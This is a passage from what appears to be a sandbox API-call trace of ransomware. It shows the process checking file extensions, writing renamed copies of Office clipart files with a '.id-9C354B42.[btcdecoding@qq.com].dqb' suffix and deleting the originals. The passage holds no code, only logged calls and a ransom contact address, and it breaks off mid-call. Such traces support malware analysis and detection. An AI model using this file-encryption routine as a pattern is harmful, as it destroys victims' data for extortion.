lpBuffer=0x3f40020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34cfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesWritten=0x34cfc9c*=0xea, lpOverlapped=0x0) returned 1 [0274.734] SetEndOfFile (hFile=0x328) returned 1 [0274.734] CloseHandle (hObject=0x328) returned 1 [0274.734] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34cfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.734] SetEndOfFile (hFile=0x324) returned 1 [0274.738] CloseHandle (hObject=0x324) returned 1 [0274.738] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.777] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid")) returned 1 [0274.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0274.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0274.812] lstrlenW (lpString=".doc") returned 4 [0274.812] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.812] lstrlenW (lpString=".docx") returned 5 [0274.812] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.812] lstrlenW (lpString=".pdf") returned 4 [0274.812] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.812] lstrlenW (lpString=".xls") returned 4 [0274.812] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.812] lstrlenW (lpString=".xlsx") returned 5 [0274.812] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.812] lstrlenW (lpString=".ppt") returned 4 [0274.812] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0274.812] lstrlenW (lpString=".zip") returned 4 [0274.812] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.812] lstrlenW (lpString=".rar") returned 4 [0274.812] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.812] lstrlenW (lpString=".bz2") returned 4 [0274.812] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.812] lstrlenW (lpString=".7z") returned 3 [0274.812] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0274.812] lstrlenW (lpString=".dbf") returned 4 [0274.813] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0274.813] lstrlenW (lpString=".1cd") returned 4 [0274.813] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0274.813] lstrlenW (lpString=".jpg") returned 4 [0274.813] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0274.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0274.813] lstrlenW (lpString=".doc") returned 4 [0274.813] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.813] lstrlenW (lpString=".docx") returned 5 [0274.813] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.813] lstrlenW (lpString=".pdf") returned 4 [0274.813] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.813] lstrlenW (lpString=".xls") returned 4 [0274.813] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.813] lstrlenW (lpString=".xlsx") returned 5 [0274.813] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.813] lstrlenW (lpString=".ppt") returned 4 [0274.813] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0274.813] lstrlenW (lpString=".zip") returned 4 [0274.813] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.813] lstrlenW (lpString=".rar") returned 4 [0274.813] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.813] lstrlenW (lpString=".bz2") returned 4 [0274.813] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.813] lstrlenW (lpString=".7z") returned 3 [0274.813] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0274.814] lstrlenW (lpString=".dbf") returned 4 [0274.814] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0274.814] lstrlenW (lpString=".1cd") returned 4 [0274.814] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62 [0274.814] lstrlenW (lpString=".jpg") returned 4 [0274.814] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.814] lstrcmpiW (lpString1=".MID", lpString2=".dqb") returned 1 [0274.814] lstrlenW (lpString="GRID_01.MID") returned 11 [0274.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0274.814] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x34cff1c | out: lpFileSize=0x34cff1c*=6331) returned 1 [0274.814] CloseHandle (hObject=0x324) returned 1 [0274.814] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid")) returned 0x20 [0274.814] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0274.815] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34cfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.815] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34cfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0274.815] GetLastError () returned 0x0 [0274.815] ReadFile (in: hFile=0x324, lpBuffer=0x3f40020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34cfed4, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesRead=0x34cfed4*=0x18bb, lpOverlapped=0x0) returned 1 [0274.829] WriteFile (in: hFile=0x1d4, lpBuffer=0x3f40020*, nNumberOfBytesToWrite=0x18c0, lpNumberOfBytesWritten=0x34cfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesWritten=0x34cfc9c*=0x18c0, lpOverlapped=0x0) returned 1 [0274.830] ReadFile (in: hFile=0x324, lpBuffer=0x3f40020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34cfed4, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesRead=0x34cfed4*=0x0, lpOverlapped=0x0) returned 1 [0274.830] WriteFile (in: hFile=0x1d4, lpBuffer=0x3f40020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34cfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesWritten=0x34cfc9c*=0xea, lpOverlapped=0x0) returned 1 [0274.830] SetEndOfFile (hFile=0x1d4) returned 1 [0274.833] CloseHandle (hObject=0x1d4) returned 1 [0274.833] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34cfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.833] SetEndOfFile (hFile=0x324) returned 1 [0274.837] CloseHandle (hObject=0x324) returned 1 [0274.837] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.837] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid")) returned 1 [0274.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0274.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0274.838] lstrlenW (lpString=".doc") returned 4 [0274.838] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.838] lstrlenW (lpString=".docx") returned 5 [0274.838] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.838] lstrlenW (lpString=".pdf") returned 4 [0274.838] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.838] lstrlenW (lpString=".xls") returned 4 [0274.838] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.838] lstrlenW (lpString=".xlsx") returned 5 [0274.838] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.838] lstrlenW (lpString=".ppt") returned 4 [0274.838] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0274.838] lstrlenW (lpString=".zip") returned 4 [0274.838] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.838] lstrlenW (lpString=".rar") returned 4 [0274.838] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.838] lstrlenW (lpString=".bz2") returned 4 [0274.838] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.838] lstrlenW (lpString=".7z") returned 3 [0274.838] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0274.839] lstrlenW (lpString=".dbf") returned 4 [0274.839] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0274.839] lstrlenW (lpString=".1cd") returned 4 [0274.839] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0274.839] lstrlenW (lpString=".jpg") returned 4 [0274.839] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0274.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0274.839] lstrlenW (lpString=".doc") returned 4 [0274.839] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.839] lstrlenW (lpString=".docx") returned 5 [0274.839] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.839] lstrlenW (lpString=".pdf") returned 4 [0274.839] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.839] lstrlenW (lpString=".xls") returned 4 [0274.839] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.839] lstrlenW (lpString=".xlsx") returned 5 [0274.839] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.839] lstrlenW (lpString=".ppt") returned 4 [0274.839] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0274.839] lstrlenW (lpString=".zip") returned 4 [0274.839] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.839] lstrlenW (lpString=".rar") returned 4 [0274.839] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.839] lstrlenW (lpString=".bz2") returned 4 [0274.839] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.839] lstrlenW (lpString=".7z") returned 3 [0274.839] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0274.840] lstrlenW (lpString=".dbf") returned 4 [0274.840] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0274.840] lstrlenW (lpString=".1cd") returned 4 [0274.840] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62 [0274.840] lstrlenW (lpString=".jpg") returned 4 [0274.840] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.840] lstrcmpiW (lpString1=".MID", lpString2=".dqb") returned 1 [0274.840] lstrlenW (lpString="HTECH_01.MID") returned 12 [0274.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0274.840] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x34cff1c | out: lpFileSize=0x34cff1c*=7178) returned 1 [0274.840] CloseHandle (hObject=0x324) returned 1 [0274.841] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid")) returned 0x20 [0274.841] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0274.841] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34cfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.841] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34cfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0274.841] GetLastError () returned 0x0 [0274.841] ReadFile (in: hFile=0x324, lpBuffer=0x3f40020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34cfed4, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesRead=0x34cfed4*=0x1c0a, lpOverlapped=0x0) returned 1 [0274.843] WriteFile (in: hFile=0x330, lpBuffer=0x3f40020*, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0x34cfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesWritten=0x34cfc9c*=0x1c10, lpOverlapped=0x0) returned 1 [0274.844] ReadFile (in: hFile=0x324, lpBuffer=0x3f40020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34cfed4, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesRead=0x34cfed4*=0x0, lpOverlapped=0x0) returned 1 [0274.844] WriteFile (in: hFile=0x330, lpBuffer=0x3f40020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34cfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesWritten=0x34cfc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.844] SetEndOfFile (hFile=0x330) returned 1 [0274.844] CloseHandle (hObject=0x330) returned 1 [0274.844] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34cfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.844] SetEndOfFile (hFile=0x324) returned 1 [0274.846] CloseHandle (hObject=0x324) returned 1 [0274.846] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.846] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid")) returned 1 [0274.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0274.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0274.847] lstrlenW (lpString=".doc") returned 4 [0274.847] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.847] lstrlenW (lpString=".docx") returned 5 [0274.847] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.847] lstrlenW (lpString=".pdf") returned 4 [0274.847] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.847] lstrlenW (lpString=".xls") returned 4 [0274.847] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.847] lstrlenW (lpString=".xlsx") returned 5 [0274.847] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.847] lstrlenW (lpString=".ppt") returned 4 [0274.847] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0274.847] lstrlenW (lpString=".zip") returned 4 [0274.847] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.847] lstrlenW (lpString=".rar") returned 4 [0274.847] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.847] lstrlenW (lpString=".bz2") returned 4 [0274.847] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.847] lstrlenW (lpString=".7z") returned 3 [0274.847] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0274.847] lstrlenW (lpString=".dbf") returned 4 [0274.847] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0274.847] lstrlenW (lpString=".1cd") returned 4 [0274.847] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0274.848] lstrlenW (lpString=".jpg") returned 4 [0274.848] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0274.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0274.848] lstrlenW (lpString=".doc") returned 4 [0274.848] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.848] lstrlenW (lpString=".docx") returned 5 [0274.848] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.848] lstrlenW (lpString=".pdf") returned 4 [0274.848] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.848] lstrlenW (lpString=".xls") returned 4 [0274.848] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.848] lstrlenW (lpString=".xlsx") returned 5 [0274.848] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.848] lstrlenW (lpString=".ppt") returned 4 [0274.848] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0274.848] lstrlenW (lpString=".zip") returned 4 [0274.848] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.849] lstrlenW (lpString=".rar") returned 4 [0274.849] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.849] lstrlenW (lpString=".bz2") returned 4 [0274.849] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.849] lstrlenW (lpString=".7z") returned 3 [0274.849] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0274.849] lstrlenW (lpString=".dbf") returned 4 [0274.849] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0274.849] lstrlenW (lpString=".1cd") returned 4 [0274.849] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned 63 [0274.849] lstrlenW (lpString=".jpg") returned 4 [0274.849] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.849] lstrcmpiW (lpString1=".MID", lpString2=".dqb") returned 1 [0274.849] lstrlenW (lpString="INDST_01.MID") returned 12 [0274.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0274.850] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x34cff1c | out: lpFileSize=0x34cff1c*=8568) returned 1 [0274.850] CloseHandle (hObject=0x324) returned 1 [0274.850] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid")) returned 0x20 [0274.850] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0274.851] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34cfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.851] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34cfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0274.857] GetLastError () returned 0x0 [0274.857] ReadFile (in: hFile=0x324, lpBuffer=0x3f40020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34cfed4, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesRead=0x34cfed4*=0x2178, lpOverlapped=0x0) returned 1 [0274.861] WriteFile (in: hFile=0x310, lpBuffer=0x3f40020*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x34cfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesWritten=0x34cfc9c*=0x2180, lpOverlapped=0x0) returned 1 [0274.862] ReadFile (in: hFile=0x324, lpBuffer=0x3f40020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34cfed4, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesRead=0x34cfed4*=0x0, lpOverlapped=0x0) returned 1 [0274.862] WriteFile (in: hFile=0x310, lpBuffer=0x3f40020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34cfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesWritten=0x34cfc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.862] SetEndOfFile (hFile=0x310) returned 1 [0274.862] CloseHandle (hObject=0x310) returned 1 [0274.862] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34cfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.862] SetEndOfFile (hFile=0x324) Thread: id = 101 os_tid = 0x684 [0268.875] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3ac00a8 [0268.875] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3ad00b0 [0268.875] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634c40 [0268.875] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x661a20 [0268.875] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 